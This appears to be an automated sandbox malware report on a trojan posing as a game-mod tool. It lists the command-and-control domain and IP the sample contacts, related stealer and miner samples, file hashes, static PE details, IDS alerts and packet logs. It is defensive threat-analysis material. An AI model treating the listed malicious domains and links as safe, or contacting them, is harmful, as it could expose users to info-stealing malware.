https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/I	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126324753.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072961421.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043660999.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1076880607.00000000014E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISG:	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126897158.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet:443/gdJISocal	Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174098985.0000000001466000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1045468538.0000000001463000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISs	Galaxy Swapper v2.0.3.exe, 00000001.00000003.984625942.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.958958687.0000000001523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/gdJIS::	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/e	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126324753.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/$	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISH	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958958687.0000000001523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gemini.google.com/app?q=	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS:1	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS:2	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1755134255.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1754952963.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174505768.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	citydisco.bet	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637030
Start date and time:	2025-03-13 10:18:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Galaxy Swapper v2.0.3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 41 Number of non-executed functions: 154
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 104.83.103.192
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:19:44	API Interceptor	7x Sleep call for process: Galaxy Swapper v2.0.3.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	http://sg-adh7.vv.885210.xyz/	Get hash	malicious	Unknown	Browse	sg-adh7.vv.885210.xyz/favicon.ico
	http://caixadirectasecdigital.com/	Get hash	malicious	HTMLPhisher	Browse	caixadirectasecdigital.com/favicon.ico
	PO NO 28950.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/
	RFQ- Italy.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.xploitation.net/sqjz/
	Enquiry Quote - 21834-01.exe	Get hash	malicious	FormBook	Browse	www.joeyvv.xyz/b80n/
	DcbI6OM1wO.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	ddrtot.shop/New/PWS/fre.php
	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/j4nd/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/3it7/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/3it7/
	hh01FRs81x.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLH

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
citydisco.bet	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	Launcher_v2.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://88tt88w.com/	Get hash	malicious	Unknown	Browse	104.21.90.19
	http://88748t.com/	Get hash	malicious	Unknown	Browse	104.21.96.1
	http://koinkeniloginn.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.64.151.8
	http://spotify-clone-site.netlify.app/	Get hash	malicious	Unknown	Browse	104.21.26.223
	brave.ps1	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://currentlyatt74267.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	104.18.38.233
	http://capitalmachine.files839docx.org/	Get hash	malicious	Unknown	Browse	188.114.97.3
	justificante de transferencia09454545.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	http://abhishek9589.github.io/netflixclone/	Get hash	malicious	HTMLPhisher	Browse	172.64.147.188

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	dok PZ 2025-03-11_142242 fin_Orygina#U0142.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	L0erlgyZ6f.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	188.114.97.3
	NB NT19901102W.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.97.3
	wJWNpO6lcm.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer	Browse	188.114.97.3
	NB NT19901102W.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3
	Launcher_v2.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	ModMenu.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.569257168462363
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Galaxy Swapper v2.0.3.exe
File size:	778'560 bytes
MD5:	36ecbd776704a4884f9978275e1bd271
SHA1:	1f260011f2abf7b9e53b98bf29d2f29a41af5e6e
SHA256:	c44547f8c9abb1ab6b9284ef25f65605f36f2ac7fbe6d93f707e65ce77dcd008
SHA512:	efc46288f9e5ffe6b4f2268bd850825924dc492710a8bf8340fb31338f0fdad2ebbb49adb549e13f2842e44e8ffffd9b208d50b84ad04a7cbc229eafd2ad17a2
SSDEEP:	12288:6IJQ/s2kiatVPnIpbWiJ621POPAANU//6dkOCVPjsSMMXNb7cnFgeadvEAfSO9uR:HBnIpnJhdQAANeShCV7svMXNAgMQufJ
TLSH:	F9F4D046BDA2D0A3E91628B14D28E7C50C6B6B244F3084F7BEDC9E646FB36E14532357
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.............................w............@.......................................@.................................P...(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4377d2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D1BF1F [Wed Mar 12 17:06:39 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	033c5f85fb620246315503dc218ebc8c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 22:24:20 02/12/2021 22:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	31F605F0D1D4BA54250DA5C719A8200C
Thumbprint SHA-1:	E8C15B4C98AD91E051EE5AF5F524A8729050B2A2
Thumbprint SHA-256:	22A3C23E08C7DBB4E7F4591E58C04285C0514C2894E3C418AD157D817D7EDF3C
Serial:	33000003DE8D56825AF1A4A9670000000003DE

Entrypoint Preview

Instruction
call 00007FD68CCAA57Ah
jmp 00007FD68CCAA3E9h
mov ecx, dword ptr [0045F840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FD68CCAA576h
test esi, ecx
jne 00007FD68CCAA598h
call 00007FD68CCAA5A1h
mov ecx, eax
cmp ecx, edi
jne 00007FD68CCAA579h
mov ecx, BB40E64Fh
jmp 00007FD68CCAA580h
test esi, ecx
jne 00007FD68CCAA57Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0045F840h], ecx
not ecx
pop edi
mov dword ptr [0045F880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0045C860h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0045C820h]
xor dword ptr [ebp-04h], eax
call dword ptr [0045C81Ch]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0045C8A8h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 004614D0h
call dword ptr [0045C880h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007FD68CCB10C5h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c650	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb9c00	0x4540	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x63000	0x276c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x58b28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x54f98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5c7c0	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x52cc0	0x52e00	b955d299ddc749adb9e2a9fa46e5dda4	False	0.5095947633861236	data	6.772334323063753	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x54000	0xa124	0xa200	147c72eee2c66963ee69f82cf3610cb3	False	0.4244068287037037	data	4.908125312415663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5f000	0x2c9c	0x1600	eab85ca8d24299491f287a6faf9660e1	False	0.4069602272727273	data	4.744736283390186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x62000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x63000	0x276c	0x2800	ed7d506be2e46b9b1c8fde31ac68b654	False	0.7849609375	data	6.600494306172883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x66000	0x58600	0x58600	bf2da6f917405ecf5305fe834c1aed57	False	1.0003342689179633	data	7.999561186710298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T10:19:44.152697+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49681	188.114.97.3	443	TCP
2025-03-13T10:19:47.428804+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49682	188.114.97.3	443	TCP
2025-03-13T10:19:50.076627+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49683	188.114.97.3	443	TCP
2025-03-13T10:19:52.794430+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49684	188.114.97.3	443	TCP
2025-03-13T10:19:56.210091+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49685	188.114.97.3	443	TCP
2025-03-13T10:19:59.324795+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49687	188.114.97.3	443	TCP
2025-03-13T10:20:04.234271+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49692	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:19:41.450445890 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:41.450481892 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:41.450557947 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:41.453490973 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:41.453501940 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:44.152462959 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:44.152697086 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:44.157325983 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:44.157351017 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:44.157686949 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:44.206979990 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:44.206979990 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:44.207175016 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.261578083 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.286139965 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.286184072 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.286218882 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.286269903 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.286293030 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.286305904 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.292815924 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.292892933 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.292911053 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.306050062 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.306092978 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.306124926 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.306124926 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.306144953 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.306168079 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.348900080 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.352464914 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.395657063 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.471028090 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.471122980 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.471189976 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.472364902 CET	49681	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.472389936 CET	443	49681	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.653532028 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.653608084 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:45.653683901 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.654011011 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:45.654027939 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:47.428653002 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:47.428803921 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:47.430242062 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:47.430264950 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:47.430519104 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:47.431794882 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:47.431951046 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:47.431996107 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:48.216731071 CET	443	49682	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:48.217025995 CET	49682	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:48.372031927 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:48.372097015 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:48.372164011 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:48.372487068 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:48.372503996 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.076463938 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.076627016 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:50.077858925 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:50.077871084 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.078094006 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.079216003 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:50.079344034 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:50.079363108 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.079407930 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:50.079412937 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.840059996 CET	443	49683	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:50.840383053 CET	49683	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:51.030198097 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:51.030260086 CET	443	49684	188.114.97.3	192.168.2.7
